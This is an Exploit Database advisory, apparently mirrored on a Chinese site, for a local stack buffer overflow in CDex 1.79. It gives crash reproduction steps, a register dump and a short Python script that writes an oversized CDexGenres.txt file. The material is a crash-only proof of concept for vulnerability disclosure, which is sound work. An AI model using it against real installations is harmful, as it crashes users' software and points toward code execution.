CDex Genre 1.79 – Local Stack Buffer Overflow

• Exploit Database
• 34 阅读

• 作者： Un_N0n
  日期： 2015-10-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38452/

• '''
  ********************************************************************************************
  # Exploit Title: CDex Genre Stack Buffer Overflow
  # Date: 10/9/2015
  # Exploit Author: Un_N0n
  # Software Link: http://cdex.mu/download
  # Version: 1.79
  # Tested on: Windows 7 x86(32 BIT)
  ********************************************************************************************
  [Steps to Produce the Crash]:
  1- Generate a File by python code mentioned below.
  2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
  3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is 
   Produced by Python Code.
  4- Open Up CDex.exe.
  ~Software will crash.
  
  On Further Analysis, We come to know that it is Stack-based-BOF.
  
  [REG-DUMP]:
  EAX 00000000
  ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" //May be handled but yet application crashes.
  EDX 0012F1A1 ASCII 0A,"STATUS_STA"
  EBX 00749338 CDex.00749338
  ESP 0012F3E8
  EBP 0012F464
  ESI 00000000
  EDI 002C7AC8
  
  EIP 779DCE96 kernel32.779DCE96
  
  0012F3F4 002C7AC8
  0012F3F8 002E25F8ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
  0012F3FC 002E5FD8
  0012F400 002E44A0
  0012F404 000003F8
  0012F408 0000007F
  0012F40C 0012F504
  0012F410 00260000
  0012F414 77C97B89RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
  0012F418 002E2580ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
  0012F41C 00001190
  '''
  
  [Code to produce CDexGenres.txt]
  buffer = "A"*66666
  file = "CDexGenres.txt"
  f = open(file,'w')
  f.write(buffer)
  f.close()
  '''
  **********************************************************************************************
  '''